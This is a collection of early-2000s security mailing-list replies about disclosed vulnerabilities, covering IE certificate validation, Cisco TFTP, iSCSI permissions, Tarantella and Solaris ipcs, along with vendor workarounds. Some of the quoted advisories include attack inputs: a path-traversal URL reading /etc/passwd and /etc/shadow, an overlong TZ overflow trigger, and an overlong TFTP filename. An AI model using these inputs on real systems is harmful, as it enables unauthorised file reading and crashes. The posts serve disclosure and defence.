people were confused by this email, and subsequently concluded that their
browser isn't vulnerable because they got an alert that the "name on the
certificate is invalid."  If you would like to see a demo of this
vulnerability, please email me offline.

> Is that what you are saying here that you got a subordinate CA signing
> certificate from Thawte (or Verisign according to your posting) for
> thoughtcrime.org and used this to generate a end entity server certificate for
> any domain you like? Or did you got an end entity server certificate from
> Thawte for www.thoughtcrime.org and used this certificate to sign end entity
> certificates?
>
> I ask this because in the basic constraints of  www.thoughtcrime.org in your
> example the "subject type" is "end entity" instead of "CA" which should be the
> case for an intermediate CA according to RFC 2459.  I think that you used a
> end entity certificate as intermediate CA, but I am not sure.

Thawte and Verisign aren't doing anything wrong.  I received an end-entity
certificate with the CA basic constraint set to FALSE from Thawte.
According to RFC 2459, intermediate CAs in a certificate chain SHOULD have
a CA basic constraint set to TRUE.  According to that document, steps "h"
through "m" should be applied to all certificates but the leaf certificate
when verifying a certificate path.  Step "i" is:

  (i) Verify that the certificate is a CA certificate (as specified
  in a basicConstraints extension or as verified out-of-band).

...so this is the point.  I'm using my joe-schmoe end-entity certificate
as an intermediate certificate, and IE is not doing step i.  The
vulnerability lies with IE.

> > As the unscrupulous administrator of www.thoughtcrime.org, I can generate
> > a valid certificate and request a signature from VeriSign:
>
> Is this a CA-signature or a end entity signature?

It's a signature from an end-entity certificate, but IE treats it as a CA
signature.

> > [CERT - Issuer: VeriSign / Subject: VeriSign]
> > -> [CERT - Issuer: VeriSign / Subject: www.thoughtcrime.org]
> >
> > Then I generate a certificate for any domain I want, and sign it using my
> > run-of-the-mill joe-blow CA-signed certificate:
>
> The "name constraints extension" in the CA certificate should not allow this.
> However in the case of a end entity certificate the name constraints extension
> is not present so you used a end entity certificate for your  run-of-the-mill
> joe-blow CA-signed certificate?
>
> > [CERT - Issuer: VeriSign / Subject: VeriSign]
> > -> [CERT - Issuer: VeriSign / Subject: www.thoughtcrime.org]
> >-> [CERT - Issuer: www.thoughtcrime.org / Subject: www.amazon.com]
>
> > Since IE doesn't check the Basic Constraints on the
> > www.thoughtcrime.org
> > certificate, it accepts this certificate chain as valid for
> > www.amazon.com.
> >
> > Anyone with any CA-signed certificate (and the corresponding private
> > key) can spoof anyone else.
>
> Not if the "name constraints extension" is properly defined by the TTP. See
> section "4.2.1.11  Name Constraints" of RFC 2459. And the "pathLenConstraint
> field" in the basic constraints is set to zero.
>
> So is IE really vulnerable or is it the TTP that messed up by not defining a
> "name constraints extension"?

IE is vulnerable.  There's no reason to have a name constraints extension
on an end-entity certificate at all.  Anyone verifying the certificate
path would trip over the absense of a CA basic constraint before even
getting to name constraints.

- Mike

--
http://www.thoughtcrime.org

Re: [VulnWatch] iDEFENSE Security Advisory: iSCSI Default Configuration File Settings

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


The Cisco PSIRT would like clarify the issue raised in the following 
iDEFENSE Security Advisory.

The installation script for the linux-iscsi drivers on Cisco's worldwide
web site (http://www.cisco.com/) and the corresponding mirrored distributions
on SourceForge (http://sourceforge.net/) installs the /etc/iscsi.conf file 
with mode 0600 (read/write only by the file owner which is set to the root 
user).  Therefore, installations of linux-iscsi installed from a distribution
downloaded from Cisco or SourceForge are not vulnerable.  Other Linux 
distributors may repackage the iSCSI drivers setting the file permissions 
appropriately for their own distribution.   

Since the /etc/iscsi.conf file contains CHAP passwords, this file should 
not be readable or writable by anyone other than the root user.   If you 
are running a version of the linux-iscsi drivers from another vendor, you
should both inspect the permissions on the /etc/iscsi.conf file and patch
your systems when those vendors issue their respective patches for the issue.

Also, let me take this opportunity to remind folks that vulnerabilities 
within any Cisco product should be reported directly to "[EMAIL PROTECTED]"
or "[EMAIL PROTECTED]".  At the very least we can assist with the
verification of the vulnerability.
 
- -Mike-


-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQA/AwUBPVLsHZPS/wbyNnWcEQJ53gCfY9MIBnFXDk6yVbpMVMSv3oVr6FIAn0Dc
y3DuunME0m7s2pChKiTDvJzW
=7o1f
-END PGP SIGNATURE-



> David Endler <[EMAIL PROTECTED]> [2002-08-08 10:30] wrote:
> iDEFENSE Security Advisory 08.08.2002 
> iSCSI Default Configuration File Settings
> 
> 
> DESCRIPTION 
> 
> iSCSI is a popular new protocol that allows the SCSI protocol 
> to be used over traditional IP networks. This allows for SAN 
> like storage arrays without requiring new network 
> infrastructure. iSCSI’s primary authentication mechanism for 
> users is the CHAP protocol (Challenge Handshake Authentication 
> Protocol), which is very resilient against replay attacks and 
> provides strong protection for the user’s password. The CHAP 
> protocol requires the user’s password to connect, and in order 
> to automate this process the user must provide the cleartext 
> password to the system that is then stored, typically in 
> cleartext, so that it will be accessible when needed. Care 
> must be taken to ensure configuration files containing the 
> cleartext password are properly protected.  For more 
> information on the CHAP protocol please see RFC 1994. 
> 
> The primary iSCSI implementation for Linux, “Linux-iSCSI” is a 
> freely available software package primarily maintained by 
> Cisco Systems. This package stores it primary configuration 
> directives in the file:
> 
> /etc/iscsi.conf
> 
> This file is created world writeable by default and no mention 
> is made in the file of the importance of protecting it from 
> being read by attackers. At least one vendor has shipped this 
> file world readable in the default configuration of a beta 
> release of an operating system, when notified they stated it 
> would be fixed in the release version of the operating system.
> 
> ANALYSIS
> 
> Any authentication systems that require cleartext passwords to 
> be stored should be carefully audited to ensure that passwords 
> are properly protected. This problem can also potentially 
> affect numerous packages, ranging from NTP and BIND to iSCSI 
> all of which require stored passwords or secrets. 
> 
> DETECTION
> 
> Check the permissions on the file:
> 
> /etc/iscsi.conf
> 
> The file should be owned by the user and group root, and only 
> the root user should be granted read and write access to the 
> file, all other permissions should be removed (i.e. file 
> permissions should be 0400) 
> 
> VENDOR RESPONSE
> 
> Red Hat has confirmed that the file /etc/iscsi.conf was set 
> world readable in the Limbo Beta, and that it will be fixed in 
> the next release version of Red Hat Linux. SuSE has confirmed 
> that the file permissions are set correctly on 
> /etc/iscsi.conf. No other major Linux vendors appear to be 
> shipping the iSCSI package yet. 
> 
> DISCOVERY CREDIT
> 
> Kurt Seifried ([EMAIL PROTECTED])
> 
> DISCLOSURE TIMELINE
> 
> July 11, 2002:Problem found on Red Hat Linux Limbo Beta #1
> Initial contacts sent to Red Hat, SuSE and Cisco
> 
> July 12, 2002:SuSE confirms file mode 600 by default, not 
> vulnerable
> Email sent to Matthew Franz at Cisco, additional Cisco 
> employees also contacted, iSCSI for Linux is an external 
> project at Cisco, PSIRT was not used, no response ever 
> received. 
> 
> July 17, 20

Re: It takes two to tango

[Mike Forrester]

> Hi,
>
> I just read the article at News.com
> (http://news.com.com/2100-1023-947325.html?tag=fd_top) about the
> controversy between HP and Snosoft.  It seems that HP is upset that
> details of a dangerous security hole in the HP Tru64 operating system
> were published by "Phased", a security researcher with Snosoft, here on
> Bugtraq.  I really feel that HP went way over the line by trying to
> place all the blame on Snosoft for HP's security hole by invoking the
> DMCA and the Computer Fraud and Abuse Act.

Sounds like now might be the time to start looking at Espon, Canon, etc. for
printers and scanners, which sucks cause I've always has good luck with
their stuff...

I would suggest that everyone who agrees send HP an email expressing your
disappointment in this matter.  Just to help those short on time:

Contact HP (USA):
http://www.hp.com/country/us/eng/contact_us.htm

E-mail Carly Fiorina (CEO):
http://www.hp.com/hpinfo/execteam/email/fiorina/index.htm

Re: VNC authentication weakness

[Mike Porter]

> To be more specific, there are two things you need in a challenge
> value:  uniqueness and unpredictability.  Lack of uniqueness allows an
> attacker to replay a past response to a future challenge.  Predictability
> allows an attacker to pre-fetch a correct future response from one of the
> parties.
>
> A counter provides perfect uniqueness (up to its maximum range) but easy
> predictability.  A physical random source provides great unpredictability

A counter is acceptable if it and a value from the entropy pool are
run through MD5 or SHA1.  The "seed" or current state of the
entropy pool must of course be kept in a secure fashion and not
revealed.  You must not ever re-issue a challenge, etc.  The
counter must be used properly and not allowed to wrap without some
sort of reseeding operation.  Otherwise, you will violate the
previous condition.

I have hardly covered all the points.  A good paper seems to be:
http://www.counterpane.com/yarrow.html.

Mike

Re: Phenoelit Advisory, 0815 ++ * - Cisco_tftp

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

We can confirm the finding made by [EMAIL PROTECTED]  The issue has been 
assigned Cisco Bug ID CSCdy03429.  Workarounds exist which can prevent the
router affected from a device reset.  At this time Cisco does not believe 
that software upgrades are necessary to resolve this issue.  Cisco IOS 
versions 12.0 and higher are not affected by this problem.

Cisco IOS versions 11.1, 11.2 and 11.3 (most trains) contain a buffer 
overflow in the embedded Trivial FTP (TFTP) server which can cause a 
reset of the device.  The buffer overflow occurs due to an unchecked 
buffer containing the filename reqested via a TFTP read-request.  From 
our testing, to cause the device to reset requires the use of a crafted 
TFTP packet, as the TFTP client side software which we tested would not 
permit a long enough filename to demonstrate the problem.

The workarounds are for all users running affected Cisco IOS versions who 
have enabled the tftp server on the device, to either disable the server 
or to add an alias onto the filenames being served via TFTP.

If TFTP server functionality is not needed the service may be disabled by
removing all commands beginning with the string "tftp-server" from the 
configuration.

In order to add an alias onto the filename being served via TFTP, you will 
need to first remove that line and add it back.

For instance, if the following configuration existed:

tftp-server flash c2500-js-l.112-20

you would need to issue the following commands.

#config terminal
Enter configuration commands, one per line.  End with CNTL/Z.
(config)#no tftp-server flash c2500-js-l.112-20
(config)#tftp-server flash c2500-js-l.112-20 alias CiscoIOS

If multiple filenames are being served via TFTP on the device and you desire
to use the workaround of adding an alias to the filename, you will have to
add an alias on each entry.  Any "tftp-server" entry without an alias on a
device running an affected version of Cisco IOS would be sufficient to be
vulnerable to a device reset.


- -Mike-


-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQA/AwUBPULi05PS/wbyNnWcEQLtegCgi+7+96I5Ur1z0JHSU0OHauUnpsEAn0jC
SoK69ovAbXtWqAyzeoQcf45d
=GWjh
-END PGP SIGNATURE-



> kim0 <[EMAIL PROTECTED]> [2002-07-27 12:52] wrote:
> 
> -- 
>kim0   <[EMAIL PROTECTED]>
>Phenoelit (http://www.phenoelit.de)
> 90C0 969C EC71 01DC 36A0  FBEF 2D72 33C0 77FC CD42

> Phenoelit Advisory 
> 
> [ Authors ]
>   FX  <[EMAIL PROTECTED]>
>   FtR <[EMAIL PROTECTED]>
>   kim0<[EMAIL PROTECTED]>
> 
>   Phenoelit Group (http://www.phenoelit.de)
>   Advisoryhttp://www.phenoelit.de/stuff/Cisco_tftp.txt
> 
> [ Affected Products ]
>   Cisco IOS 
> 
>   Tested on
>   IOS 11.1 - 11.3
> 
>   Cisco Bug ID:   
> CERT Vulnerability ID: 689579
> 
> [ Vendor communication ]
> 06/29/02Initial Notification,
>   [EMAIL PROTECTED] & [EMAIL PROTECTED]
> *Note-Initial notification by phenoelit
> includes a cc to [EMAIL PROTECTED] by default
> 06/30/02Human confirmation from PSIRT @ Cisco
> 06/30/02 (2)Discussion of detail
> 07/01/02Continued discussion for reproducing problem
> 07/01/02Receipt, ack. and clarification by [EMAIL PROTECTED]
> 07/03/02Continued discussions with PSIRT
> 07/19/02Notification of intent to post publically
> in apx. 7 days.
> 07/25/02Final coordination for release. 
> 
> [ Overview ]
>   Cisco Systems Routers are the most widely used routers.  
>   Cisco Routers are embedded network devices that run a dedicated 
>   Operating System, the Cisco IOS.
>   
> [ Description ]
>   The Cisco IOS integrated TFTP server suffers from a buffer overflow 
>   condition. 
>   When requesting a file name with approximately 700 characters, the device 
>   crashes and may reboot. This only happens, if the served file is on a 
>   flash device and no alias is assigned to it.
> 
>   Vulnerable:
>   router# conf t
>   router# tftp-server flash:ios_11.3_a-b-c-d.bin
>   
>   Not vulnerable:
>   router# conf t
>   router# tftp-server flash:ios_11.3_a-b-c-d.bin alias TheStuff
>   
> [ Example ]
>   OpenBSD# tftp cisco53.navy.smil.mil
>   tftp> get A(700 times)
> 
> [ Solution ]
>   None available at this time
> 
> [ end of file ]
> 
> 

> [- End of Included Message -]

Re: ISS Apache Advisory Response

[Mike Eldridge]

On Thu, Jun 20, 2002 at 06:06:03PM -0400, Klaus, Chris (ISSAtlanta) wrote:
> There has been a lot of misinformation spread about our ISS Apache Advisory
> and wanted to clean up any confusion and misunderstanding.
>  
> 1)  Our policy for publishing advisories is to give a vendor 30 to 45
> day quiet period to provide an opportunity to create a patch or work around.
> If an exploit for the vulnerability appears in the wild, or a patch and
> work-around is provided by the vendor or ISS X-Force, this quiet period is
> disregarded and the ISS X-Force advisory is published immediately.
>  
> In the case of this advisory, ISS X-Force provided an Apache patch and did
> not see a need for a long quiet period.

this is a poor justification and is showing extreme disrespect to the
apache project.

if there was a hole in my software package abc, responsibility for
closing the hole is up to *me*, not you.  i would find it extremely
disrespectful and irresponsible if you released an advisory and provided
your *own* patch for it, no matter if it closed the hole or not.

what if your patch caused more problems than it fixed, which is possible
since it's extremely doubtful that you would have more intimate
knowledge of the project than the principal developers do.

the responsibility is the developers', not yours.

-mike


   /~\  the ascii subvert the dominant paradigm
   \ /  ribbon campaign
X   against html
   / \  email!

bugtraq@security.nnov.ru list issue: NcFTPd

[Mike Gleason]

>>>  (this came from a bugtraq posting by [EMAIL PROTECTED])
>>>
>>> On Thu, Jun 20, 2002 at 02:00:51PM +0400, 3APA3A wrote:
>>>
>>>>
>>>>   3.  There  was  also  report by DocSoft  on 
>>>> buffer
>>>>   overflow  in  some  older version of ncftpd on Solaris , but I was 
>>>> not
>>>>   able to reproduce it at least on demo version of ncftpd >= 2.5.0 
>>>> under
>>>>   FreeBSD,  so  it  was  bounced.  Overflow  is on FTP DELE command 
>>>> with
>>>>   buffer  >  256  bytes. Feel free to contact DocSoft if you can 
>>>> confirm
>>>>   vulnerability.


I can't read Russian, but I am guessing that DocSoft is making a similar 
incorrect conclusion to what the older versions of the Nessus scanner 
used to do.  Below is a snippet from the page 
http://hackcastle.hut.ru/p_bugs.htm, which contains some cyrillic 
characters, so it may not be legible, but:

$B'"'Q'T'Q(B $B'S(B NcFTPd Server [author: DocSoft]
$B'1'`'c'^'`'d'b'V'd'n(B
$B'2'V'Q']'Z'Y'Q'h'Z'q(B DoS-$B'Q'd'Q'\'Z(B $B'_'Q(B FTP

I do see "DoS" so I assume that the DocSoft is concluding that sending a 
very long "DELE ...AAA" is causing NcFTPd to exit because the 
connection is abruptly closed.  Often when a server process abruptly 
closes the connection it means that the server process has crashed, 
resulting in (a minimum) of a denial-of-service.

However, NcFTPd has code to detect clients looking for buffer overflows, 
and when it detects a client attempting one, NcFTPd forcefully 
disconnects the user.  Older versions used to simply boot them off with 
no message, but that was changed so that it sends back an FTP "550" 
response first, _then_ it disconnects them.

Long story short: sending "DELE " followed by a huge number of 
characters does not cause any version of NcFTPd Server to crash or 
overflow an internal buffer.

Mike Gleason
NcFTP Software
http://www.NcFTP.com

Re: Catalyst 4000 - Cisco's Response

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-



The MAC address learning rate in a Cisco Catalyst 4000 series switch depends 
on a variety of factors such as Switch load and traffic patterns. Under 
certain circumstances, such as a large layer 2 network deployment where a 
many to many traffic pattern is prevalent, the learning rate may be such 
that more than one packet is flooded for a given host.  Flooding packets
onto all LAN segments is standard behavior for devices doing transparent
bridging when the destination MAC address entry does not exist within a 
database on the switch containing switch ports and the MAC addresses sourced
behind those ports.  The circumstances in which this behavior can be observed 
include high rates of address aging and learning, Spanning-tree Topology 
Changes, moderate to high Switch CPU load, Asymmetric routing, and general 
traffic patterns.  

In order to minimize the effects of this behavior address aging and learning 
needs to be minimized.  Reducing Spanning-tree Topology Change Notifications, 
adjusting MAC address aging time and avoiding asymmetric routing conditions 
will all reduce period address aging and learning to reduce flooding of 
unicast packets.


- -Mike-





-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQEVAwUBPQ7TSg/VLJ+budTTAQEFwQf/bcgthaSiZUaiIotY5rX1OpNESjLntd3t
5NENyWstoIi3EfFbyaifAjFXlQz7wdRmbPk94UTgx54SVyOh9+gbdinZBMX6PUqI
rqkIEb/dGoVwS+rixvQ3tVK1PTDxPhY1gp0eapXUB8cG3F0FJc5qpHfyvKjUoRlg
eTYJXYr2XmZeQq2v1b/+J+hiHYus5bJkppeLoMTnhu3tLOarRFithr6Kxxz/yD7I
MoB0RGkDMIixh3xi1ex75LMnUJqXxscGy240g+rJEoJ1tPhltc5UK2RSdnCHOEz3
TXEPzoDG9pRQtWZh++i8N4b2yuoDYY2+tcG2gdssUGPpKElfh22CWA==
=OMRw
-END PGP SIGNATURE-



> [On Mon May 20 09:38:25 2002, COULOMBE, TROY wrote]
> Issue:
>   Unicast packets flooded out switch ports they shouldn't be.
> 
> Platform:
>   Cisco Catalyst 4000
> 
> OS:
>   5.5.5; 6.3.5; 7.1.2; probably all others
> 
> Environment:
>   Single VLAN, non-default "VLAN 1"; No Spanning Tree; 10/100 48 port
> blades.
>   NO SPAN session is created.
>   Using a sniffer to capture broadcasts/multicasts, etc only.
> 
> Vendor, Vendor Notified, Date Notified:
>   Yes, Cisco, 04/10/2002; case C579249, no fix supplied
> 
> Detailed description:
>   Middle of a TCP conversation, unicast packets sent to a host are
> flooded out all ports. 
> 
>   Using a sniffer [EtherPeek NX for Windows, NAI Sniffer Pro], the
> Cat4006 floods TCP packets out 
> to all ports.  Packets captured are unicast-mac and are not destined for the
> port the sniffer is on.  
> No SPAN session is created on the switch; only broadcasts/multicasts and
> _initial_ session packets should be
> flooded.  Sniffer is on a different port than the workstation and servers.
> 
>   Given:
>   It is understood that if the switch doesn't know where a MAC is, it
> will flood the packet out all
> ports until the MAC is learned, and the CAM table is populated.  Initial TCP
> packets are also captured by the
> sniffer, however, these packets would be indicated by the "SYN" flag, and
> are considered normal.
> 
> However, what is happening, is that TCP session packets are being flooded,
> although the switch _should_ have learned 
> the MAC.  
> 
> Example:
>   
> 01) workstation   -->   DNS server
>   UDP DNS request packet
> 02) workstation   <--   DNS server
>   UDP DNS response packet
> 03) workstation   -->   Server
>   Initial TCP SYN packet
> 04) workstation   <--   Server
>   TCP SYN-ACK packet  
> 05) workstation   -->   Server
>   TCP ACK Packet
> 06) workstation   <--   Server
>   TCP Packet W
> 07) workstation   <--   Server
>   TCP Packet X
> 08) workstation   <--   Server
>   TCP Packet Y
> 09) workstation   <--   Server
>   TCP Packet Z
> 
> Packet #01 is _not_ seen by the sniffer, and rightly so, assuming the switch
> knows the MAC entry for the DNS server.
> 
> Packet #02 is seen by the sniffer, but shouldn't have been.  The switch
> should have learned the workstation's MAC 
>   entry from packet #01.
> Packet #03 is _not_ seen by the sniffer, and rightly so, assuming the switch
> knows the MAC entry for the Server.
> 
> Packet #04 is seen by the sniffer, but shouldn't have been; no matter what.
> The switch now has had 2 different packets 
>   from the workstation to learn it's MAC.
> 
> Packet #05 is _not_ seen by the sniffer, and rightly so...
> 
> Packet #06 through #09 are seen by the sniffer, but shouldn't have been!
> 
> Packet #10 is assumed to be an "ACK" from the workstation and suddenly the
> switch

Re: QPopper 4.0.4 buffer overflow

[J Mike Rollins]

> Affected versions 4.0.3 and 4.0.4. default install.
> Servers, not processing user`s configuration file
> (~/.qpopper-options) are insensible to this bug.

Our testing has shown that you must use the -u parameter to be susceptible
to this vulnerability.

If you don't use the -u parameter for qpopper this file is not accessed.

You can use the -d parameter to view the debug output to verify this.

Mike

  UNIX Systems Administrator at Wake Forest University.
==
      J. Mike Rollins  [EMAIL PROTECTED]
 Wake Forest University http://www.wfu.edu/~rollins
Winston-Salem, NCwork: (336) 758-1938
==

Re: KPMG-2002013: Coldfusion Path Disclosure

[Mike Fetherston]

Hi,

Just tested with CF 4.5 & 5.0 Enterprise on NT4 using Apache.  It is not
vulnerable.  You receive a 403 - Forbidden when you try to access
nul/con.cfm/dbm with no path disclosure.

Sincerely,

Mike Fetherston.

> > Problem:
> > 
> > Requests for certain DOS-devices are parsed by the isapi filter that
> > handles .cfm and .dbm and result in error messages containing the
> > physical path to the web root.
> >
> >
> > Vulnerable:
> > ===
> > - Coldfusion 5.0 on Windows 2000 w. IIS5
> > - Other versions were not tested.
>
> ColdFusion 4.0 and 4.5 using IIS 3.0 and 4.0 on Windows NT 4.0 also appear
> to be vulnerable.
>
> Work around for IIS 4.0 appears to be identical to for IIS 5.0.  I cannot
> determine any sort of fix for IIS 3.0.
>
> The one drawback of the work around is that if you go to any .cfm or .dbm
> file that does not exist, you get a standard 404 error from the webserver
> rather than the considerably prettier (not that that says much) 404
> message that ColdFusion returns.
>
> I'd like to thank Peter Grundl (sorry about the umlaut but I can't figure
> out how to do it in my email client) and KPMG for finding this out for us.
>
> Have a great day!  (Or night!)
>
>
> Christopher Ess
> System Administrator / CDTT (Certified Duct Tape Technician)
>
>
>

Re: Multiple Vendor "talkd" user validation fault.

[Mike Scher]

On 3 Apr 2002, Tekno pHReak wrote:
[...]
> Their exist a flaw within the "talkd" which allows anyone masquerade as
> anyone else either remotely or within the confines of the system. This
> is due to the lack of user validation by the "talkd"  for incoming
> "talk" requests. This may be a catalyist for social engineering which
> can lead to the revealing of private or sensitive information from other
> users.
[...]

Ah, talk request spoofing.

This very problem was discussed way back in 1996 on Best Of Security
(BoS). It's good to see people are still talking about the problem and
proving it IS an issue.

I suppose the sad part of it all is that this problem was discussed,
shrugged off, and more or less ignored for so long that it's resurfaced,
complete with a new tool to exploit it.  Kudos to Teknophreak for bringing
it to light again, and for the publication of the spoofer, since that may
hammer the issue home.

A copy of the informative 1996 posting by Rombout de Backer ([EMAIL PROTECTED]) is
at: http://www.tao.ca/writing/archives/security/0214.html

A cleaner copy, from a repost to the OpenBSD lists, is at:
http://www.monkey.org/openbsd/archive/tech/9604/msg00010.html


de Backer also posted a one-liner proof-of-concept change to the talk from
NetKit-B-0.05, and there were modified ytalk clients floating around with
command-line options for spoofing by the end of April, 1996.  Any
suggested fixes to talk will only work locally, where the daemon can do
some checking; any remote fixes really depend on changing the protocol or
migrating to a safer (or explicitly untrusted) chat system.  AUTH lookups
(as suggested in the de Backer post) don't really cut it:  n/talk are UDP
protocols.

  -M

-- 
  Michael Brian Scher[EMAIL PROTECTED]
   Mailaise: n, ('mail-aze).  See Outlook.

'Code Red' does not seem to be scanning for IIS

[Mike Brockman]

>From what i read about the 'Code Red'-worm, it was supposed to be scanning
for IIS-servers. It obviously is'nt, i believe it tries to infect
everything they find on port 80, or something as simple as that.

About three to four days ago, i started to get those default.ida-GET's in
my Apache-logs. I shut down the server as fast as i could, and checked for
outgoing connections from my computer, and then did some research.
I was told that it was an IIS-worm, and that it could'nt affect
Apache-servers, so i was safe. I turned the server back on, and from that
day i have received forty-one attempts.

How can this be? Why am i getting so few attempts, if it is as eEye says
-- that every worm-instance has the same seed?
I should be getting tons and tons of tries, if the worm has been around
for this long. Or is it that my IP is high up in the "sequence", and not
many comes that far? If that is the case, the number should be increasing
fast in the near future, right?

I'll come back with a report in a week or so.

____
 m'name be mike brockman! jeeh!
_ooh,_und_dunt_feed_my_eskimoes_

Re: Two birds with one worm.

[Mike Lewinski]

> It looks like the "Code Red" worm has the added side effect of
crashing
> Cisco (675/678) DSL CPEs running any CBOS prior to 2.4.1. The GET it
sends
> looking for IIS servers hardlocks any modem with the web management
> interface enabled.

FYI I believe we're seeing secondary effects on other higher-end
Cisco's (i.e. 7500's)

----- Original Message -
From: "Mike Lewinski" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, July 19, 2001 1:00 PM
Subject: Code Red -> Router Memory depletion?


> We've seen two routers experiencing problems this AM that appear to be
> related to client swervers infected with the IIS Code Red virus. I say
> appear because of the timing with cpu profiles on downstream routers
> where infections broke out, but I don't have any direct evidence.
>
> The first one was a border router:
>
> Jul 19 08:00:47 5093: 2w5d: %SYS-2-MALLOCFAIL: Memory allocation of
> 65540 bytes failed from 0x603BF35C, pool Processor, alignment 0
> Jul 19 08:00:47 5094: -Process= "BGP Router", ipl= 0, pid= 86
>
> # sh ver
> uptime is 4 hours, 46 minutes
> System returned to ROM by bus error at PC 0x603BFCFC, address
0xFFF0
> at 05:57:21 UTC Thu Jul 19 2001
>
> The other one is a client aggregation router
>
> Jul 19 12:02:49 192: %SYS-2-MALLOCFAIL: Memory allocation of 1964
bytes
> failed from 0x314DA4A, pool Processor, alignment 0
> Jul 19 12:02:49 193: -Process= "OSPF Router", ipl= 0, pid= 32
>
> (This router is still functioning, but not allowing any incoming
> connections on telnet).
>
> -Mike
>
>

Re: Solaris whodo Vulnerability

[Mike Gerdts]

On Thu, Jul 05, 2001 at 10:55:55AM -0400, Pablo Sor wrote:
> 
> Clear the suid bit of 
> 
> /usr/sbin/sparcv7/whodo (SunOS 5.8 Sparc)
> /usr/sbin/i86/whodo (SunOS 5.8, 5.7 Intel)
> /usr/sbin/whodo (SunOS 5.5.1)
> 

A likely addition to this list is /usr/sbin/sparcv9/whodo.  This is the
64-bit version which is not installed by default on 32-bit systems.

Mike

Re: Mozilla is excessively generous.

[Mike Shaver]

> 208.191.35.126 - - [27/Jun/2001:21:07:21 -0400] "GET /~qg/billy.html HTTP/1.1" 200 
>333 
>"mailbox:///home/dustin/.mozilla/dustin/uo1voac3.slt/Mail/Mail/mail.ink-1.org/Inbox?number=29822904"
> "Mozilla/5.0 (X11; U; Linux 2.2.16-22 i686; en-US; rv:0.9.1) Gecko/20010608"
> 
> Would anyone working on the Mozilla project care to add dustin's password
> to this line in my web logs?  Maybe his mother's maiden name?

If you'd bothered to report this to mozilla.org, via bugzilla, rather 
than just going straight to bugtraq[*], you would probably have found 
bug 83038, which was fixed for mozilla 0.9.2.  (0.9.2 froze tonight for 
final QA before release.)

People using Mozilla < 1.0 should probably be aware that there are bugs 
remaining, and some of those bugs may affect the security of the 
application.  I don't think there are any serious ones left outstanding, 
but I may not just "serious" like you do, and there may yet be some 
undiscovered/unreported.

[*] Not that I have a problem with people mailing bugtraq to let people 
know what they should watch for, but if someone else _hadn't_ reported 
this to bugzilla, we might not have fixed it in time for 0.9.2.  I 
assume that's what you want, and that you weren't just posting to be 
clever at our expense.

Mike
(not on bugtraq, please cc: on replies)

Re: SurfControl Internet Monitoring/Blocking

[Mike Ciavarella]

I received similar treatment from them about a year and a half ago regarding
an issue that completely bypassed any filtering that *should have been*
taking place, just like yours. I could get no update from them on the status
of the patch. The patch was released the next day after posting the issue to
this list. There was barely any mention of the huge flaw in the filter
mechanism within the release notes of the patch, and it was buried within
all the other fixes. If I wasn't looking for it, I would have skipped right
over it.  Given it's severity, I was expecting a rather speedy response and
notification as a registered customer that my current version was
ineffective without the patch! I had to pester the tech I contacted about
the flaw to get any info, and what I received was only that it would be
fixed in the next cumulative patch. SurfControl took about a month to
release the patch from the time I notified them. No notification (as far as
I know) ever went out to the customers. I do believe that a notice went to
this list regarding the fix, but that was all.

--Mike

Re: SCO Tarantella Remote file read via ttawebtop.cgi

[Mike McEwen]

On Monday June 18, KF wrote:
> SCO has been notified of this issue. 
> 
> 
>  Original Message 
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> 
> 
> 
>http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
> 
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
> 
> 
> No perms to shadow... 
> 
> 
>http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
> 
>  
> File missing
> 
> The following file could not be found:
> 
>   
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
> 
>  Please give this information to a Tarantella Administrator.
> 
> -KF


This problem was introduced in release 3.01 and was caught during a security 
audit and was fixed for our last release (Tarantella 3.10).

It is a problem for releases 3.00 and 3.01 only.

To fix this problem upgrade to 3.10.

Thank you for reporting this problem.

 - Mike McEwen

Re: Solaris ipcs vulnerability

[Mike Batchelor]

Failed to reproduce this problem on Solaris 2.6 and 8 for SPARC.  Ipcs
behaved normally, except for printing out the long string of "A"'s in the
output header where the timezone would appear.

> Solaris ipcs vulnerability
>
> Release Date:
> April 11, 2001
>
> Systems Affected:
> Solaris 7 (x86)
> Other versions of Solaris are most likely affected also.
>
> Discovered by:
> Riley Hassell [EMAIL PROTECTED]
>
> bash-2.03$ TZ=`perl -e 'print "A"x1035'`
> bash-2.03$ /usr/bin/i86/ipcs
> IPC status from as of Wed Apr 11 17:18:59 [buffer] 2001
> Message Queue facility inactive.
> T ID KEY MODE OWNER GROUP
> Shared Memory:
> m 0 0x54d3 --rw-r--r-- root root
> Semaphore facility inactive.
> Segmentation Fault (core dumped)

Re: [COVERT-2001-02] Globbing Vulnerabilities in Multiple FTP Daemons

[Mike Gleason]

NcFTPd Server for UNIX from NcFTP Software is not vulnerable to the
pathname globbing buffer overflow described by NAI COVERT Labs advisory
(COVERT-2001-02) (which is also documented in CERT Advisory CA-2001-07).

Additionally, NcFTPd Server is not vulnerable to the globbing
denial-of-service bug mentioned recently (March 16) on BUGTRAQ.

Mike Gleason
NcFTP Software
http://www.NcFTP.com

(I apologize in advance if this message does not display correctly - I
disabled HTML mail format in Microsoft Outlook so hopefully there will
be no problems.)




 smime.p7s